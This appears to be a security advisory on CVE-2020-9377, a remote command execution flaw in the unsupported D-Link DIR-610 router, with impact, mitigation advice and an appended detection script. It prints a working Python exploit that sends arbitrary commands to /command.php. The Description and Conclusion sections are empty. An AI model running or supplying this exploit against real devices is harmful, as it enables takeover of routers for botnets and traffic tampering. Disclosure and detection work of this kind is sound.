Heitor Gouvêa


CVE-2020-9377 - Remote Code Execution (RCE) on D-LINK 610 Router

Summary

The DIR-610 is a router that was developed and sold by D-Link and distributed in Central America and South America.


Description


Exploit

#!/usr/bin/python

import os
import sys
import urllib2
import threading
import time

def main(host, port, uid, command):
    request = urllib2.Request('http://%s:%s/command.php' % (host, port), 'cmd=%s' % command, { 'Cookie': 'uid=%s' % uid })
    print urllib2.urlopen(request).read()

if __name__ == '__main__':
    [host, port, uid, command] = sys.argv[1:5]
    main(host, port, uid, command)

Impact

A malicious actor can remotely execute commands on the router's operating system, take control of the device, and make it perform whatever actions they want, such as using it in botnets or to infect traffic, among other possibilities.


Mitigation

While D-Link is aware of vulnerabilities involving DIR-610, these products have reached End of Life (EoL)/End of Support (EoS) and there is no extended support or development for them. D-Link will not be able to resolve device or firmware issues as all development and customer support has ceased.

The DIR-610 Rev. Ax reached its End of Support date in 2014. It is no longer supported and firmware development has stopped. All consumers still using the product should retire it and replace the device immediately.
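
Because no firmware fix will be released, networks that still contain one of these devices can at least watch for the request the exploit above sends: a POST to /command.php carrying a cmd form field. The following detection check is an added example, not part of the original post; the function names and the sample requests are constructed for illustration.

```python
from urllib.parse import urlsplit, unquote, parse_qs

def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    # Raises ValueError if the first line is not "METHOD target VERSION".
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # Normalise the path so /command%2Ephp and /COMMAND.PHP?x=1 still match.
    path = unquote(urlsplit(target).path).lower()
    return method.upper(), path, headers, body.decode("latin-1")

def flag_command_php(raw: bytes):
    """Return the decoded cmd value if the request matches, else None."""
    try:
        method, path, _headers, body = parse_request(raw)
    except ValueError:
        return None  # not a parseable HTTP request line (e.g. TLS bytes)
    if method != "POST" or path != "/command.php":
        return None
    params = parse_qs(body, keep_blank_values=True)
    if "cmd" not in params:
        return None
    return params["cmd"][0]

# Constructed sample traffic (hosts are documentation addresses).
SAMPLES = [
    b"POST /command.php HTTP/1.1\r\nHost: 192.0.2.1\r\n"
    b"Cookie: uid=EXAMPLE\r\n\r\ncmd=uname%20-a",
    b"POST /command%2Ephp?x=1 HTTP/1.1\r\nHost: 192.0.2.1\r\n\r\ncmd=id",
    b"GET /index.php HTTP/1.1\r\nHost: 192.0.2.1\r\n\r\n",
    b"POST /login.php HTTP/1.1\r\nHost: 192.0.2.1\r\n\r\nuser=admin",
    b"\x16\x03\x01\x02\x00",
]

def scan(samples):
    """Return (index, cmd) for every sample that matches the pattern."""
    hits = []
    for i, raw in enumerate(samples):
        cmd = flag_command_php(raw)
        if cmd is not None:
            hits.append((i, cmd))
    return hits

if __name__ == "__main__":
    for index, cmd in scan(SAMPLES):
        print("ALERT sample %d: cmd=%r sent to /command.php" % (index, cmd))
```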


Conclusion

